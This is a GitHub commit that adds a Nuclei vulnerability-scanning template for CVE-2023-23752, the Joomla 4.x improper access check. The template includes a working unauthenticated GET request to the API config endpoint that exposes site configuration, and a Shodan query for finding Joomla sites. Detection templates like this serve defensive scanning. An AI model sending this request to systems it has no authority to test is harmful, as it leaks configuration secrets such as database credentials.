Merge pull request #6763 from projectdiscovery/CVE-2023-23752

Create CVE-2023-23752.yaml
patch-1
pussycat0x 2023-02-20 15:15:52 +05:30 committed by GitHub
commit 8099bf122f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2023-23752
info:
name: Joomla Improper AccessCheck in WebService Endpoint
author: badboycxcc
severity: high
description: |
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
remediation: Upgrade to Joomla! version 4.2.8 or later.
reference:
- https://unsafe.sh/go-149780.html
- https://twitter.com/gov_hack/status/1626471960141238272/photo/1
- https://cve.report/CVE-2023-23752
metadata:
verified: "true"
shodan-query: html:"Joomla! - Open Source Content Management"
tags: cve,cve2023,joomla
requests:
- method: GET
path:
- '{{BaseURL}}/api/index.php/v1/config/application?public=true'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"links":'
- '"attributes":'
condition: and
- type: word
part: header
words:
- 'application/json'
- 'application/vnd.api+json'
condition: or
- type: status
status:
- 200